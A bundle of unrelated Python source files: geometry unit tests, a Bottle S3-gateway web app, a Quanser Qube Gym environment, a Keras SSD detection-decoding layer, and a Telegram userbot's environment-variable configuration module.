y = x + Rectangle(1, 2, 3, 4)
self.assertEqual(y, Rectangle(101, 237, 203, 339))
def test_operator_add_eq(self):
x = Rectangle(100, 235, 200, 335)
x += Point(35, 65)
self.assertEqual(x, Rectangle(135, 300, 235, 400))
x = Rectangle(100, 235, 200, 335)
x += Rectangle(1, 2, 3, 4)
self.assertEqual(x, Rectangle(101, 237, 203, 339))
def test_operator_sub(self):
x = Rectangle(100, 235, 200, 335)
y = x - Point(35, 65)
self.assertEqual(y, Rectangle(65, 170, 165, 270))
x = Rectangle(100, 235, 200, 335)
y = x - Rectangle(1, 2, 3, 4)
self.assertEqual(y, Rectangle(99, 233, 197, 331))
def test_operator_sub_eq(self):
x = Rectangle(100, 235, 200, 335)
x -= Point(35, 65)
self.assertEqual(x, Rectangle(65, 170, 165, 270))
x = Rectangle(100, 235, 200, 335)
x -= Rectangle(1, 2, 3, 4)
self.assertEqual(x, Rectangle(99, 233, 197, 331))
def test_bottom_right(self):
rc = Rectangle(210, 150, 350, 900)
pt = rc.bottom_right()
self.assertTrue(isinstance(pt, Point))
self.assertEqual(pt, Point(350, 900))
def test_center_point(self):
rc = Rectangle(210, 150, 350, 900)
pt = rc.center_point()
self.assertTrue(isinstance(pt, Point))
self.assertEqual(pt, Point(280, 525))
def test_deflates(self):
rc = Rectangle(10, 10, 50, 50)
rc.deflate(1, 2)
self.assertEqual(rc, Rectangle(11, 12, 49, 48))
rc = Rectangle(10, 10, 50, 50)
rc.deflate_rect(Rectangle(1, 2, 3, 4))
self.assertEqual(rc, Rectangle(11, 12, 47, 46))
def test_height_and_width(self):
rc = Rectangle(20, 30, 80, 70)
self.assertEqual(rc.height(), 40)
self.assertEqual(rc.width(), 60)
def test_inflates(self):
rc = Rectangle(0, 0, 300, 300)
rc.inflate(50, 200)
self.assertEqual(rc, Rectangle(-50, -200, 350, 500))
rc = Rectangle(0, 0, 300, 300)
rc.inflate_rect(Rectangle(50, 60, 300, 310))
self.assertEqual(rc, Rectangle(-50, -60, 600, 610))
def test_intersect(self):
rc = Rectangle(125, 0, 150, 200)
result = rc.intersect(Rectangle(0, 75, 350, 95))
self.assertEqual(result, Rectangle(125, 75, 150, 95))
def test_is_empty(self):
none = Rectangle()
some = Rectangle(35, 50, 135, 150)
null = Rectangle(35, 35, 35, 35)
self.assertTrue(none.is_empty())
self.assertFalse(some.is_empty())
self.assertTrue(null.is_empty())
def test_is_null(self):
none = Rectangle()
some = Rectangle(35, 50, 135, 150)
null = Rectangle(35, 35, 35, 35)
self.assertTrue(none.is_null())
self.assertFalse(some.is_null())
self.assertFalse(null.is_null())
def test_move_to_x(self):
rc = Rectangle(0, 0, 100, 100)
rc.move_to_x(10)
self.assertEqual(rc, Rectangle(10, 0, 110, 100))
def test_move_to_xy(self):
rc = Rectangle(0, 0, 100, 100)
rc.move_to_xy(10, 20)
self.assertEqual(rc, Rectangle(10, 20, 110, 120))
def test_move_to_y(self):
rc = Rectangle(0, 0, 100, 100)
rc.move_to_y(20)
self.assertEqual(rc, Rectangle(0, 20, 100, 120))
def test_normalize(self):
x = Rectangle(110, 100, 250, 310)
x.normalize()
y = Rectangle(250, 310, 110, 100)
y.normalize()
self.assertEqual(x, y)
x = Rectangle(0, 0, 100, 100)
x.normalize()
self.assertEqual(x, Rectangle(0, 0, 100, 100))
def test_offset(self):
x = Rectangle(0, 0, 35, 35)
x.offset(230, 230)
self.assertEqual(x, Rectangle(230, 230, 265, 265))
def test_pt_in_rect(self):
x = Rectangle(5, 5, 100, 100)
self.assertTrue(x.pt_in_rect(Point(35, 50)))
self.assertFalse(x.pt_in_rect(Point(125, 298)))
def test_sets(self):
x = Rectangle()
self.assertEqual(x, Rectangle(0, 0, 0, 0))
x.set(256, 256, 512, 512)
self.assertEqual(x, Rectangle(256, 256, 512, 512))
x.set_empty()
self.assertEqual(x, Rectangle())
def test_size(self):
x = Rectangle(10, 10, 50, 50)
sz = x.size()
self.assertTrue(isinstance(sz, Size))
self.assertEqual(sz, Size(40, 40))
# def test_subtract_rect(self):
# x = Rectangle(10, 10, 100, 100)
# y = Rectangle(50, 10, 150, 150)
# z = x.subtract_rect(y)
# self.assertEqual(x, Rectangle(10, 10, 50, 100))
def test_top_left(self):
x = Rectangle(128, 128, 256, 256)
pt = x.top_left()
self.assertTrue(isinstance(pt, Point))
self.assertEqual(pt, Point(128, 128))
def test_union(self):
x = Rectangle(100, 0, 200, 300)
y = Rectangle(0, 100, 300, 200)
z = x.union(y)
self.assertEqual(z, Rectangle(0, 0, 300, 300))
def test_width(self):
x = Rectangle(20, 30, 80, 70)
self.assertEqual(x.width(), 60)
class SizeUnitTests(unittest.TestCase):
def test_constructor(self):
sz_default = Size()
self.assertEqual(sz_default.cx, 0)
self.assertEqual(sz_default.cy, 0)
sz_a = Size(10, 25)
sz_b = Size(cy=25, cx=10)
self.assertEqual(sz_a, sz_b)
def test_operator_eq(self):
sz1 = Size(135, 135)
sz2 = Size(135, 135)
self.assertTrue(sz1 == sz2)
self.assertFalse(sz1 is sz2)
def test_operator_neq(self):
sz1 = Size(111, 111)
sz2 = Size(222, 222)
self.assertTrue(sz1 != sz2)
def test_operator_add_eq(self):
x = Size(100, 100)
y = Size(50, 25)
x += y
self.assertEqual(x, Size(150, 125))
self.assertEqual(y, Size(50, 25))
def test_operator_sub_eq(self):
x = Size(100, 100)
y = Size(50, 25)
x -= y
self.assertEqual(x, Size(50, 75))
self.assertEqual(y, Size(50, 25))
def test_operator_add(self):
x = Size(100, 100)
y = Size(50, 25)
z = x + y
self.assertEqual(x, Size(100, 100))
self.assertEqual(y, Size(50, 25))
self.assertEqual(z, Size(150, 125))
def test_operator_sub(self):
x = Size(100, 100)
y = Size(50, 25)
z = x - y
self.assertEqual(x, Size(100, 100))
self.assertEqual(y, Size(50, 25))
self.assertEqual(z, Size(50, 75))
unittest.main()
|
"""
WSGI file used for bottle interface.
"""
import sys
import os
from os.path import abspath, dirname
import bottle
import ctools.dbfile
import s3_gateway
import s3_reports
DBREADER_BASH_FILE = os.path.join( os.getenv('HOME'), 'dbreader.bash')
try:
dbreader = ctools.dbfile.DBMySQLAuth.FromEnv( DBREADER_BASH_FILE )
except FileNotFoundError as e:
dbreader = None
@bottle.route('/ver')
def func_ver():
"""Demo for reporting python version. Allows us to validate we are using Python3"""
return bottle.template("Python version {{version}}", version=sys.version)
@bottle.route('/hello/<name>')
def func_hello(name):
"""Demo for testing bottle parameter passing"""
return bottle.template('<b>Hello {{name}}</b>! Running Python version {{version}}',
name=name, version=sys.version)
@bottle.route('/test_template')
def func_test_template():
"""Testpoint for testing template without using S3"""
prefix = 'a/b/c/d/e/f'
path = ''
paths = []
for part in prefix.split('/'):
path += part + '/'
paths.append((path, part))
dirs = ['subdir1', 'subdir2']
# pylint: disable=C0301
files = [
{'a':'https://company.com/a', 'basename':'a', 'size':100, 'ETag':'n/a', 'sha2_256':'n/a', 'sha3_256':'n/a'},
{'a':'https://company.com/b', 'basename':'b', 'size':200, 'ETag':'n/a', 'sha2_256':'n/a', 'sha3_256':'n/a'}
]
return s3_gateway.S3_INDEX.render(prefix=prefix, paths=paths, files=files, dirs=dirs)
@bottle.route('/')
def func_root():
"""TODO: return a better template"""
return bottle.static_file('index.html', root=os.path.join(dirname(abspath(__file__)), 'static'))
@bottle.route('/corpora/')
def func_corpora():
"""Route https://downloads.digitalcorpora.org/corpora/ with no path"""
return s3_gateway.s3_app(bucket='digitalcorpora', quoted_prefix='corpora/', auth=dbreader)
@bottle.route('/corpora/<path:path>')
def func_corpora_path(path):
"""Route https://downloads.digitalcorpora.org/corpora/path"""
return s3_gateway.s3_app(bucket='digitalcorpora', quoted_prefix='corpora/' + path, auth=dbreader)
@bottle.route('/downloads/')
@bottle.route('/downloads/<path:path>')
def func_downloads_path(path=''):
"""Route https://downloads.digitalcorpora.org/downloads/path"""
return s3_gateway.s3_app(bucket='digitalcorpora', quoted_prefix='downloads/' + path, auth=dbreader)
@bottle.route('/robots.txt')
def func_robots():
"""Route https://downloads.digitalcorpora.org/robots.txt which asks Google not to index this."""
return s3_gateway.s3_app(bucket='digitalcorpora', quoted_prefix='robots.txt')
@bottle.route('/reports')
def func_stats():
return s3_reports.report_app(auth=dbreader)
@bottle.route('/reports.js')
def func_root():
"""TODO: return a better template"""
return bottle.static_file('reports.js', root=os.path.join(dirname(abspath(__file__)), 'static'))
@bottle.route('/reports/json/<num>')
def func_stats(num):
return s3_reports.report_json(auth=dbreader,num=num)
def app():
"""The application"""
return bottle.default_app()
|
"""Base code for all OpenAI Gym environments of the Qube.
This base class defines the general behavior and variables of all Qube environments.
Furthermore, this class defines if a simulation or the hardware version of the Qube should be used by initialising the
specific corresponding Qube class at the variable `qube`.
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import gym
import numpy as np
from gym import spaces
from gym.utils import seeding
# For other platforms where it's impossible to install the HIL SDK
try:
from gym_brt.quanser import QubeHardware
except ImportError:
print("Warning: Can not import QubeHardware in qube_base_env.py")
MAX_MOTOR_VOLTAGE = 18
ACT_MAX = np.asarray([MAX_MOTOR_VOLTAGE], dtype=np.float64)
# OBS_MAX = [params, alpha, theta_dot, alpha_dot]
OBS_MAX = np.asarray([np.pi / 2, np.pi, np.inf, np.inf], dtype=np.float64)
def normalize_angle(angle):
return angle/np.pi
class QubeBaseEnv(gym.Env):
"""Base class for all qube-based environments.
This base class cannot be instantiated since the methods `_reward` and `_isdone` are not defined in this base
code. For this a subclass like `QubeSwingupEnv` should be used.
The subclasses of this base class determine the starting point of the task (i.e. pole starts upwards), the end
points of the task (i.e. a specific angle threshold of the pole in the balance task) and also the reward
structure of the task.
Each of those subclasses holds a specific qube instantiation defined at `self.qube`. This qube instantiation
might be a instance of the hardware interface, the ODE simulation or the Mujoco simulation (PyBullet currently
not supported).
Every qube instantiation should implement the same methods to ensure a common behavior so that those classes are
interchangeable.
Each subclass of this base class should be used with a `with` statement to ensure that the environment is
closed correctly:
```python
import gym
from gym_brt.envs import QubeBeginDownEnv
with QubeSwingupEnv(use_simulator=False, frequency=250) as env:
controller = QubeFlipUpControl(sample_freq=frequency, env=env)
for episode in range(2):
state = env.reset()
for step in range(5000):
action = controller.action(state)
state, reward, done, info = env.step(action)
```
Instead it can also be closed manually by using explicitly calling `env.close()` inside a try-finally statement.
"""
def __init__(self, frequency=250, batch_size=2048, use_simulator=False, simulation_mode='ode',
integration_steps=10, encoder_reset_steps=int(1e8),):
"""Starting point for the creation of new instances of a Qube (both simulation and hardware).
Args:
frequency: Sample frequency
batch_size: Number of timesteps of a single episode
use_simulator: Specifies if a simulator should be used instead of the hardware
simulation_mode: If `use_simulator=True` this specifies the used simulator; either `ode`, `mujoco` or
`bullet`; does not affect the hardware classes
integration_steps: Number of integration steps of the simulation during a single timestep; does not affect
the hardware classes
encoder_reset_steps: Number of timesteps to be done after the hardware encoders should be reinitialized
"""
self.observation_space = spaces.Box(-OBS_MAX, OBS_MAX, dtype=np.float64)
self.action_space = spaces.Box(-ACT_MAX, ACT_MAX, dtype=np.float64)
self.reward_range = (-float(0.), float(1.))
self._frequency = frequency
# Ensures that samples in episode are the same as batch size
# Reset every batch_size steps (2048 ~= 8.192 seconds)
self._max_episode_steps = batch_size
self._episode_steps = 0
self._encoder_reset_steps = encoder_reset_steps
if not self._encoder_reset_steps:
self._encoder_reset_steps = int(1e8)
self._steps_since_encoder_reset = 0
self._target_angle = 0
self._theta, self._alpha, self._theta_dot, self._alpha_dot = 0, 0, 0, 0
self._dtheta, self._dalpha = 0, 0
# Open the Qube: This means create the appropriate interface (simulation or hardware)
if use_simulator:
if simulation_mode == 'ode' or simulation_mode == 'euler':
# TODO: Check assumption: ODE integration should be ~ once per ms
from gym_brt.quanser import QubeSimulator
#integration_steps = int(np.ceil(1000 / self._frequency))
self.qube = QubeSimulator(
forward_model=simulation_mode,
frequency=self._frequency,
integration_steps=integration_steps,
max_voltage=MAX_MOTOR_VOLTAGE,
)
self._own_rendering = True
elif simulation_mode == 'mujoco':
from gym_brt.envs.simulation.mujoco import QubeMujoco
#integration_steps = int(np.ceil(1000 / self._frequency))
self.qube = QubeMujoco(
frequency=self._frequency,
integration_steps=integration_steps,
max_voltage=MAX_MOTOR_VOLTAGE,
)
self._own_rendering = False
elif simulation_mode == 'bullet':
from gym_brt.envs.simulation.pybullet import QubeBullet
self.qube = QubeBullet(
frequency=self._frequency,
integration_steps=integration_steps,
max_voltage=MAX_MOTOR_VOLTAGE,
)
self._own_rendering = False
else:
raise ValueError(f"Unsupported simulation type '{simulation_mode}'. "
f"Valid ones are 'ode', 'mujoco' and 'bullet'.")
else:
self.qube = QubeHardware(frequency=self._frequency, max_voltage=MAX_MOTOR_VOLTAGE)
self._own_rendering = True
self.qube.__enter__()
self.seed()
self._viewer = None
self._episode_reward = 0
@property
def frequency(self):
return self._frequency
@property
def sim(self):
try:
return self.qube.sim
except AttributeError:
raise AttributeError(f"'{self.qube}' object has no attribute 'sim'")
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close(type=type, value=value, traceback=traceback)
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def _step(self, action):
led = self._led()
action = np.clip(np.array(action, dtype=np.float64), -ACT_MAX, ACT_MAX)
state = self.qube.step(action, led=led)
self._dtheta = state[0] - self._theta
self._dalpha = state[1] - self._alpha
self._theta, self._alpha, self._theta_dot, self._alpha_dot = state
def reset(self):
self._episode_reward = 0
self._episode_steps = 0
# Occasionaly reset the encoders to remove sensor drift
if self._steps_since_encoder_reset >= self._encoder_reset_steps:
self.qube.reset_encoders()
self._steps_since_encoder_reset = 0
action = np.zeros(shape=self.action_space.shape, dtype=self.action_space.dtype)
self._step(action)
return self._get_state()
def _reset_up(self):
self.qube.reset_up()
action = np.zeros(shape=self.action_space.shape, dtype=self.action_space.dtype)
self._step(action)
return self._get_state()
def _reset_down(self):
self.qube.reset_down()
action = np.zeros(shape=self.action_space.shape, dtype=self.action_space.dtype)
self._step(action)
return self._get_state()
def _get_state(self):
return np.array(
[self._theta, self._alpha, self._theta_dot, self._alpha_dot],
dtype=np.float64,
)
def _next_target_angle(self):
return 0
def _reward(self):
raise NotImplementedError
def _isdone(self):
raise NotImplementedError
def _led(self):
led = [0.0, 0.0, 0.0]
# if self._isdone(): # Doing reset
# led = [1.0, 1.0, 0.0] # Yellow
# else:
# if abs(self._alpha) > (20 * np.pi / 180):
# led = [1.0, 0.0, 0.0] # Red
# elif abs(self._theta) > (90 * np.pi / 180):
# led = [1.0, 0.0, 0.0] # Red
# else:
# led = [0.0, 1.0, 0.0] # Green
return led
def step(self, action):
self._step(action)
state = self._get_state()
reward = self._reward()
done = self._isdone()
self._episode_reward += reward
info = {
"theta": self._theta,
"alpha": self._alpha,
"theta_dot": self._theta_dot,
"alpha_dot": self._alpha_dot,
}
self._episode_steps += 1
self._steps_since_encoder_reset += 1
self._target_angle = self._next_target_angle()
return state, reward, done, info
def render(self, mode="human", width=1024, height=1024):
# TODO: Different modes
if self._own_rendering:
if self._viewer is None:
from gym_brt.envs.rendering import QubeRenderer
self._viewer = QubeRenderer(self._theta, self._alpha, self._frequency)
return self._viewer.render(self._theta, self._alpha)
else:
return self.qube.render(mode=mode, width=width, height=height)
def close(self, type=None, value=None, traceback=None):
# Safely close the Qube (important on hardware)
self.qube.close(type=type, value=value, traceback=traceback)
if self._viewer is not None:
self._viewer.close()
|
'''
A custom Keras layer to decode the raw SSD prediction output. Corresponds to the
`DetectionOutput` layer type in the original Caffe implementation of SSD.
Copyright (C) 2018 Pierluigi Ferrari
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
NOTICE: This file is a modified version by Viet Anh Nguyen (vietanh@vietanhdev.com)
'''
from __future__ import division
import numpy as np
import tensorflow as tf
import keras.backend as K
from keras.layers import Layer, InputSpec
class DecodeDetections(Layer):
'''
A Keras layer to decode the raw SSD prediction output.
Input shape:
3D tensor of shape `(batch_size, n_boxes, n_classes + 12)`.
Output shape:
3D tensor of shape `(batch_size, top_k, 6)`.
'''
def __init__(self,
confidence_thresh=0.01,
iou_threshold=0.45,
top_k=200,
nms_max_output_size=400,
coords='centroids',
normalize_coords=True,
img_height=None,
img_width=None,
**kwargs):
'''
All default argument values follow the Caffe implementation.
Arguments:
confidence_thresh (float, optional): A float in [0,1), the minimum classification confidence in a specific
positive class in order to be considered for the non-maximum suppression stage for the respective class.
A lower value will result in a larger part of the selection process being done by the non-maximum suppression
stage, while a larger value will result in a larger part of the selection process happening in the confidence
thresholding stage.
iou_threshold (float, optional): A float in [0,1]. All boxes with a Jaccard similarity of greater than `iou_threshold`
with a locally maximal box will be removed from the set of predictions for a given class, where 'maximal' refers
to the box score.
top_k (int, optional): The number of highest scoring predictions to be kept for each batch item after the
non-maximum suppression stage.
nms_max_output_size (int, optional): The maximum number of predictions that will be left after performing non-maximum
suppression.
coords (str, optional): The box coordinate format that the model outputs. Must be 'centroids'
i.e. the format `(cx, cy, w, h)` (box center coordinates, width, and height). Other coordinate formats are
currently not supported.
normalize_coords (bool, optional): Set to `True` if the model outputs relative coordinates (i.e. coordinates in [0,1])
and you wish to transform these relative coordinates back to absolute coordinates. If the model outputs
relative coordinates, but you do not want to convert them back to absolute coordinates, set this to `False`.
Do not set this to `True` if the model already outputs absolute coordinates, as that would result in incorrect
coordinates. Requires `img_height` and `img_width` if set to `True`.
img_height (int, optional): The height of the input images. Only needed if `normalize_coords` is `True`.
img_width (int, optional): The width of the input images. Only needed if `normalize_coords` is `True`.
'''
if K.backend() != 'tensorflow':
raise TypeError("This layer only supports TensorFlow at the moment, but you are using the {} backend.".format(K.backend()))
if normalize_coords and ((img_height is None) or (img_width is None)):
raise ValueError("If relative box coordinates are supposed to be converted to absolute coordinates, the decoder needs the image size in order to decode the predictions, but `img_height == {}` and `img_width == {}`".format(img_height, img_width))
if coords != 'centroids':
raise ValueError("The DetectionOutput layer currently only supports the 'centroids' coordinate format.")
# We need these members for the config.
self.confidence_thresh = confidence_thresh
self.iou_threshold = iou_threshold
self.top_k = top_k
self.normalize_coords = normalize_coords
self.img_height = img_height
self.img_width = img_width
self.coords = coords
self.nms_max_output_size = nms_max_output_size
# We need these members for TensorFlow.
self.tf_confidence_thresh = tf.constant(self.confidence_thresh, name='confidence_thresh')
self.tf_iou_threshold = tf.constant(self.iou_threshold, name='iou_threshold')
self.tf_top_k = tf.constant(self.top_k, name='top_k')
self.tf_normalize_coords = tf.constant(self.normalize_coords, name='normalize_coords')
self.tf_img_height = tf.constant(self.img_height, dtype=tf.float32, name='img_height')
self.tf_img_width = tf.constant(self.img_width, dtype=tf.float32, name='img_width')
self.tf_nms_max_output_size = tf.constant(self.nms_max_output_size, name='nms_max_output_size')
super(DecodeDetections, self).__init__(**kwargs)
def build(self, input_shape):
self.input_spec = [InputSpec(shape=input_shape)]
super(DecodeDetections, self).build(input_shape)
def call(self, y_pred, mask=None):
'''
Returns:
3D tensor of shape `(batch_size, top_k, 6)`. The second axis is zero-padded
to always yield `top_k` predictions per batch item. The last axis contains
the coordinates for each predicted box in the format
`[class_id, confidence, xmin, ymin, xmax, ymax]`.
'''
#####################################################################################
# 1. Convert the box coordinates from predicted anchor box offsets to predicted
# absolute coordinates
#####################################################################################
# Convert anchor box offsets to image offsets.
cx = y_pred[...,-12] * y_pred[...,-4] * y_pred[...,-6] + y_pred[...,-8] # cx = cx_pred * cx_variance * w_anchor + cx_anchor
cy = y_pred[...,-11] * y_pred[...,-3] * y_pred[...,-5] + y_pred[...,-7] # cy = cy_pred * cy_variance * h_anchor + cy_anchor
w = tf.exp(y_pred[...,-10] * y_pred[...,-2]) * y_pred[...,-6] # w = exp(w_pred * variance_w) * w_anchor
h = tf.exp(y_pred[...,-9] * y_pred[...,-1]) * y_pred[...,-5] # h = exp(h_pred * variance_h) * h_anchor
# Convert 'centroids' to 'corners'.
xmin = cx - 0.5 * w
ymin = cy - 0.5 * h
xmax = cx + 0.5 * w
ymax = cy + 0.5 * h
# If the model predicts box coordinates relative to the image dimensions and they are supposed
# to be converted back to absolute coordinates, do that.
def normalized_coords():
xmin1 = tf.expand_dims(xmin * self.tf_img_width, axis=-1)
ymin1 = tf.expand_dims(ymin * self.tf_img_height, axis=-1)
xmax1 = tf.expand_dims(xmax * self.tf_img_width, axis=-1)
ymax1 = tf.expand_dims(ymax * self.tf_img_height, axis=-1)
return xmin1, ymin1, xmax1, ymax1
def non_normalized_coords():
return tf.expand_dims(xmin, axis=-1), tf.expand_dims(ymin, axis=-1), tf.expand_dims(xmax, axis=-1), tf.expand_dims(ymax, axis=-1)
xmin, ymin, xmax, ymax = tf.cond(pred=self.tf_normalize_coords, true_fn=normalized_coords, false_fn=non_normalized_coords)
# Concatenate the one-hot class confidences and the converted box coordinates to form the decoded predictions tensor.
y_pred = tf.concat(values=[y_pred[...,:-12], xmin, ymin, xmax, ymax], axis=-1)
#####################################################################################
# 2. Perform confidence thresholding, per-class non-maximum suppression, and
# top-k filtering.
#####################################################################################
batch_size = tf.shape(input=y_pred)[0] # Output dtype: tf.int32
n_boxes = tf.shape(input=y_pred)[1]
n_classes = y_pred.shape[2] - 4
class_indices = tf.range(1, n_classes)
# Create a function that filters the predictions for the given batch item. Specifically, it performs:
# - confidence thresholding
# - non-maximum suppression (NMS)
# - top-k filtering
def filter_predictions(batch_item):
# Create a function that filters the predictions for one single class.
def filter_single_class(index):
# From a tensor of shape (n_boxes, n_classes + 4 coordinates) extract
# a tensor of shape (n_boxes, 1 + 4 coordinates) that contains the
# confidnece values for just one class, determined by `index`.
confidences = tf.expand_dims(batch_item[..., index], axis=-1)
class_id = tf.fill(dims=tf.shape(input=confidences), value=tf.cast(index, dtype=tf.float32))
box_coordinates = batch_item[...,-4:]
single_class = tf.concat([class_id, confidences, box_coordinates], axis=-1)
# Apply confidence thresholding with respect to the class defined by `index`.
threshold_met = single_class[:,1] > self.tf_confidence_thresh
single_class = tf.boolean_mask(tensor=single_class,
mask=threshold_met)
# If any boxes made the threshold, perform NMS.
def perform_nms():
scores = single_class[...,1]
# `tf.image.non_max_suppression()` needs the box coordinates in the format `(ymin, xmin, ymax, xmax)`.
xmin = tf.expand_dims(single_class[...,-4], axis=-1)
ymin = tf.expand_dims(single_class[...,-3], axis=-1)
xmax = tf.expand_dims(single_class[...,-2], axis=-1)
ymax = tf.expand_dims(single_class[...,-1], axis=-1)
boxes = tf.concat(values=[ymin, xmin, ymax, xmax], axis=-1)
maxima_indices = tf.image.non_max_suppression(boxes=boxes,
scores=scores,
max_output_size=self.tf_nms_max_output_size,
iou_threshold=self.iou_threshold,
name='non_maximum_suppresion')
maxima = tf.gather(params=single_class,
indices=maxima_indices,
axis=0)
return maxima
def no_confident_predictions():
return tf.constant(value=0.0, shape=(1,6))
single_class_nms = tf.cond(pred=tf.equal(tf.size(input=single_class), 0), true_fn=no_confident_predictions, false_fn=perform_nms)
# Make sure `single_class` is exactly `self.nms_max_output_size` elements long.
padded_single_class = tf.pad(tensor=single_class_nms,
paddings=[[0, self.tf_nms_max_output_size - tf.shape(input=single_class_nms)[0]], [0, 0]],
mode='CONSTANT',
constant_values=0.0)
return padded_single_class
# Iterate `filter_single_class()` over all class indices.
filtered_single_classes = tf.map_fn(fn=lambda i: filter_single_class(i),
elems=tf.range(1,n_classes),
dtype=tf.float32,
parallel_iterations=128,
back_prop=False,
swap_memory=False,
infer_shape=True,
name='loop_over_classes')
# Concatenate the filtered results for all individual classes to one tensor.
filtered_predictions = tf.reshape(tensor=filtered_single_classes, shape=(-1,6))
# Perform top-k filtering for this batch item or pad it in case there are
# fewer than `self.top_k` boxes left at this point. Either way, produce a
# tensor of length `self.top_k`. By the time we return the final results tensor
# for the whole batch, all batch items must have the same number of predicted
# boxes so that the tensor dimensions are homogenous. If fewer than `self.top_k`
# predictions are left after the filtering process above, we pad the missing
# predictions with zeros as dummy entries.
def top_k():
return tf.gather(params=filtered_predictions,
indices=tf.nn.top_k(filtered_predictions[:, 1], k=self.tf_top_k, sorted=True).indices,
axis=0)
def pad_and_top_k():
padded_predictions = tf.pad(tensor=filtered_predictions,
paddings=[[0, self.tf_top_k - tf.shape(input=filtered_predictions)[0]], [0, 0]],
mode='CONSTANT',
constant_values=0.0)
return tf.gather(params=padded_predictions,
indices=tf.nn.top_k(padded_predictions[:, 1], k=self.tf_top_k, sorted=True).indices,
axis=0)
top_k_boxes = tf.cond(pred=tf.greater_equal(tf.shape(input=filtered_predictions)[0], self.tf_top_k), true_fn=top_k, false_fn=pad_and_top_k)
return top_k_boxes
# Iterate `filter_predictions()` over all batch items.
output_tensor = tf.map_fn(fn=lambda x: filter_predictions(x),
elems=y_pred,
dtype=None,
parallel_iterations=128,
back_prop=False,
swap_memory=False,
infer_shape=True,
name='loop_over_batch')
return output_tensor
def compute_output_shape(self, input_shape):
batch_size, n_boxes, last_axis = input_shape
return (batch_size, self.tf_top_k, 6) # Last axis: (class_ID, confidence, 4 box coordinates)
def get_config(self):
config = {
'confidence_thresh': self.confidence_thresh,
'iou_threshold': self.iou_threshold,
'top_k': self.top_k,
'nms_max_output_size': self.nms_max_output_size,
'coords': self.coords,
'normalize_coords': self.normalize_coords,
'img_height': self.img_height,
'img_width': self.img_width,
}
base_config = super(DecodeDetections, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
|
import os
import sys
from telethon.sessions import StringSession
from telethon import TelegramClient
from var import Var
os.system("pip install pySmartDL")
os.system("pip install sqlalchemy==1.3.23")
from pylast import LastFMNetwork, md5
from logging import basicConfig, getLogger, INFO, DEBUG
from distutils.util import strtobool as sb
from pySmartDL import SmartDL
from dotenv import load_dotenv
import asyncio
import pylast
from requests import get
import time
Lastupdate = time.time()
os.system("pip install --upgrade pip")
if Var.STRING_SESSION:
session_name = str(Var.STRING_SESSION)
bot = TelegramClient(StringSession(session_name), Var.APP_ID, Var.API_HASH)
else:
session_name = "startup"
bot = TelegramClient(session_name, Var.APP_ID, Var.API_HASH)
CMD_LIST = {}
# for later purposes
CMD_HELP = {}
INT_PLUG = ""
LOAD_PLUG = {}
# PaperPlaneExtended Support Vars
ENV = os.environ.get("ENV", False)
""" PPE initialization. """
from logging import basicConfig, getLogger, INFO, DEBUG
from distutils.util import strtobool as sb
import asyncio
import pylast
from pySmartDL import SmartDL
from requests import get
# Bot Logs setup:
if bool(ENV):
CONSOLE_LOGGER_VERBOSE = sb(os.environ.get("CONSOLE_LOGGER_VERBOSE", "False"))
if CONSOLE_LOGGER_VERBOSE:
basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
level=DEBUG,
)
else:
basicConfig(format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
level=INFO)
LOGS = getLogger(__name__)
# Check if the config was edited by using the already used variable.
# Basically, its the 'virginity check' for the config file ;)
CONFIG_CHECK = os.environ.get(
"___________PLOX_______REMOVE_____THIS_____LINE__________", None)
if CONFIG_CHECK:
LOGS.info(
"Please remove the line mentioned in the first hashtag from the config.env file"
)
quit(1)
# Logging channel/group configuration.
BOTLOG_CHATID = os.environ.get("BOTLOG_CHATID", None)
try:
BOTLOG_CHATID = int(BOTLOG_CHATID)
except:
pass
# Userbot logging feature switch.
BOTLOG = sb(os.environ.get("BOTLOG", "True"))
LOGSPAMMER = sb(os.environ.get("LOGSPAMMER", "True"))
# Bleep Blop, this is a bot ;)
PM_AUTO_BAN = sb(os.environ.get("PM_AUTO_BAN", "True"))
# Console verbose logging
CONSOLE_LOGGER_VERBOSE = sb(os.environ.get("CONSOLE_LOGGER_VERBOSE", "False"))
# SQL Database URI
DB_URI = os.environ.get("DATABASE_URL", None)
# OCR API key
OCR_SPACE_API_KEY = os.environ.get("OCR_SPACE_API_KEY", None)
# remove.bg API key
REM_BG_API_KEY = os.environ.get("REM_BG_API_KEY", None)
# Chrome Driver and Headless Google Chrome Binaries
CHROME_DRIVER = os.environ.get("CHROME_DRIVER", None)
GOOGLE_CHROME_BIN = os.environ.get("GOOGLE_CHROME_BIN", None)
# OpenWeatherMap API Key
OPEN_WEATHER_MAP_APPID = os.environ.get("OPEN_WEATHER_MAP_APPID", None)
# Anti Spambot Config
ANTI_SPAMBOT = sb(os.environ.get("ANTI_SPAMBOT", "False"))
ANTI_SPAMBOT_SHOUT = sb(os.environ.get("ANTI_SPAMBOT_SHOUT", "False"))
# FedBan Premium Module
F_BAN_LOGGER_GROUP = os.environ.get("F_BAN_LOGGER_GROUP", None)
# Cbutton
PRIVATE_CHANNEL_BOT_API_ID = os.environ.get("PRIVATE_CHANNEL_BOT_API_ID", None)
# Heroku Credentials for updater.
HEROKU_MEMEZ = sb(os.environ.get("HEROKU_MEMEZ", "False"))
HEROKU_APP_NAME = os.environ.get("HEROKU_APP_NAME", None)
HEROKU_API_KEY = os.environ.get("HEROKU_API_KEY", None)
# Youtube API key
YOUTUBE_API_KEY = os.environ.get("YOUTUBE_API_KEY", None)
# Default .alive name
ALIVE_NAME = os.environ.get("ALIVE_NAME", None)
AUTONAME = os.environ.get("AUTONAME", None)
#Autobio
AUTO_BIO = os.environ.get("AUTO_BIO", None)
# Time & Date - Country and Time Zone
COUNTRY = str(os.environ.get("COUNTRY", "India"))
TZ_NUMBER = int(os.environ.get("TZ_NUMBER", 1))
FBAN_REASON = os.environ.get("FBAN_REASON", None)
FBAN_USER = os.environ.get("FBAN_USER", None)
# Clean Welcome
# Clean Welcome
